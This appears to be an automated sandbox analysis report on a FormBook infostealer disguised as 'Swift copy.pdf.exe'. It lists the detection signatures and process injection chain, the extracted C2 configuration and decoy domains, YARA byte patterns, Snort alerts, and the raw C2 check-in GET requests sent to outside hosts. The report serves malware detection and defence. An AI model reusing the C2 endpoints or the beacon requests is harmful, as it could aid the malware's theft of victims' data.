Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Swift copy.pdf.exe

Overview

General Information

Sample Name:Swift copy.pdf.exe
Analysis ID:385261
MD5:5946d0ee4becb515a1cf39ef3f3dde56
SHA1:3321193ab8c09ab1098d8104afd021145eca89c3
SHA256:2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Swift copy.pdf.exe (PID: 6628 cmdline: 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6896 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6904 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • cscript.exe (PID: 6180 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6248 cmdline: /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wapgoals.com/ifne/"], "decoy": ["science1230.com", "louiesluncheonette.com", "radsum.info", "ziscogore.com", "smlet.com", "bbasgroup.com", "trailyerlife.com", "sparklingtheworld.com", "rileysboutique.com", "weightneutralmetflex.com", "haznegocioconnosotros.com", "hfuu.net", "tdfsz.com", "buymy1sthome.com", "karmicreaction.com", "yy111.xyz", "bkajaxkja.com", "midtownbuilder.com", "stepmed.life", "alkeses.com", "xstreamagile.com", "prostroyka.com", "xisiman1688.com", "eyelashextensionssanantonio.com", "arrowinsightshunter.com", "lehoachi.com", "rasodemeinkauntha.com", "columbiaprobateattorney.com", "ashleypeckich.com", "thevintagemarque.com", "lorofineart.com", "wearegrowthhackerz.com", "abramstrucking.net", "technomark.xyz", "cursalee.com", "ultimatecatnutrtion.com", "fundamentalflavors.com", "jamaicanallstars.net", "africanosworld.com", "maskfinland.com", "modkit.design", "xuannghiaduong.com", "indiafoodtraveling.com", "towhonoatelecilasyah.site", "agenciaorange.net", "shelterlaapparel.com", "criticalredux.com", "srl-4.com", "bioclear.energy", "mytransactionkeeper.com", "elektroliquid.com", "brabrains.com", "melodylandrum.com", "felipestephan.com", "rosemancreations.com", "lithoprints.art", "ulsanteam.com", "datingliste.online", "solitairenola.com", "kuppers.info", "burningpeel.com", "myscottdalechiropractor.com", "greenzebranetworks.com", "marktheoilguy.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Swift copy.pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Swift copy.pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Swift copy.pdf.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        5.2.Swift copy.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.Swift copy.pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.wapgoals.com/ifne/"], "decoy": ["science1230.com", "louiesluncheonette.com", "radsum.info", "ziscogore.com", "smlet.com", "bbasgroup.com", "trailyerlife.com", "sparklingtheworld.com", "rileysboutique.com", "weightneutralmetflex.com", "haznegocioconnosotros.com", "hfuu.net", "tdfsz.com", "buymy1sthome.com", "karmicreaction.com", "yy111.xyz", "bkajaxkja.com", "midtownbuilder.com", "stepmed.life", "alkeses.com", "xstreamagile.com", "prostroyka.com", "xisiman1688.com", "eyelashextensionssanantonio.com", "arrowinsightshunter.com", "lehoachi.com", "rasodemeinkauntha.com", "columbiaprobateattorney.com", "ashleypeckich.com", "thevintagemarque.com", "lorofineart.com", "wearegrowthhackerz.com", "abramstrucking.net", "technomark.xyz", "cursalee.com", "ultimatecatnutrtion.com", "fundamentalflavors.com", "jamaicanallstars.net", "africanosworld.com", "maskfinland.com", "modkit.design", "xuannghiaduong.com", "indiafoodtraveling.com", "towhonoatelecilasyah.site", "agenciaorange.net", "shelterlaapparel.com", "criticalredux.com", "srl-4.com", "bioclear.energy", "mytransactionkeeper.com", "elektroliquid.com", "brabrains.com", "melodylandrum.com", "felipestephan.com", "rosemancreations.com", "lithoprints.art", "ulsanteam.com", "datingliste.online", "solitairenola.com", "kuppers.info", "burningpeel.com", "myscottdalechiropractor.com", "greenzebranetworks.com", "marktheoilguy.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Swift copy.pdf.exeVirustotal: Detection: 30%Perma Link
          Source: Swift copy.pdf.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Swift copy.pdf.exeJoe Sandbox ML: detected
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Swift copy.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Swift copy.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.wapgoals.com/ifne/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.technomark.xyz
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.wapgoals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.criticalredux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.rileysboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.agenciaorange.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.technomark.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.indiafoodtraveling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
          Source: Joe Sandbox ViewASN Name: IHNETUS IHNETUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.wapgoals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.criticalredux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.rileysboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.agenciaorange.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.technomark.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1Host: www.indiafoodtraveling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.wapgoals.com
          Source: Swift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: Swift copy.pdf.exe, 00000000.00000002.351601216.0000000002791000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Swift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlv
          Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comL
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma-d
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comdjq
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.n
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coms
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comu
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmll
          Source: Swift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comltom4~g
